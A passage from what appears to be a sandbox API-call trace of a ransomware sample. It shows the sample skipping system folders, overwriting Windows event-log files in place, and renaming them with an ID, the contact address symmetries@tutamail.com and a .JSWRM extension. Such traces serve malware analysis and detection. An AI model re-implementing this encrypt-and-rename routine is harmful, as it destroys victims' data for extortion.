"c:\\logs\\microsoft-windows-ntfs%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.940] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0065.940] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2=".") returned 1 [0065.940] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="..") returned 1 [0065.940] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="...") returned 1 [0065.940] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="windows") returned -1 [0065.940] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="recovery") returned -1 [0065.940] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="perflogs") returned -1 [0065.941] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="documents and settings") returned 1 [0065.941] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.941] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="system volume information") returned -1 [0065.941] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="msocache") returned -1 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0065.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4WHC.evtx", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4WHC.evtx", cchWideChar=32, lpMultiByteStr=0x1f84e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Ntfs%4WHC.evtx", lpUsedDefaultChar=0x0) returned 32 [0065.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0065.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4WHC.evtx", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4WHC.evtx", cchWideChar=32, lpMultiByteStr=0x1f8638, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Ntfs%4WHC.evtx", lpUsedDefaultChar=0x0) returned 32 [0065.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0065.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0065.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0065.941] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.941] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.941] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.941] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.947] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.947] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.947] CloseHandle (hObject=0x450) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0065.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0065.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0065.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0065.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0065.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.950] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.950] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0065.950] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2=".") returned 1 [0065.950] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="..") returned 1 [0065.950] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="...") returned 1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="windows") returned -1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="recovery") returned -1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="perflogs") returned -1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="documents and settings") returned 1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="system volume information") returned -1 [0065.951] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="msocache") returned -1 [0065.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0065.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0065.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0065.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchWideChar=74, lpMultiByteStr=0x22c538, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpUsedDefaultChar=0x0) returned 74 [0065.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0065.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0065.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0065.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0065.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchWideChar=74, lpMultiByteStr=0x22bf08, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpUsedDefaultChar=0x0) returned 74 [0065.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0065.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0065.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0065.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0065.951] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.952] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.952] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.952] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.958] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.958] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.958] CloseHandle (hObject=0x450) returned 1 [0065.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0065.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0065.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0065.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0065.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x1f19f0 [0065.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0065.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.960] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0065.961] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2=".") returned 1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="..") returned 1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="...") returned 1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="windows") returned -1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="recovery") returned -1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="perflogs") returned -1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="system volume information") returned -1 [0065.961] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="msocache") returned -1 [0065.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0065.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ReadyBoost%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0065.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ReadyBoost%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x1f8670, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpUsedDefaultChar=0x0) returned 46 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0065.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0065.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ReadyBoost%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0065.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ReadyBoost%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x1f8638, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpUsedDefaultChar=0x0) returned 46 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0065.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0065.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0065.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.961] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.962] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.962] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.962] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.991] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.991] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.992] CloseHandle (hObject=0x450) returned 1 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0065.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: 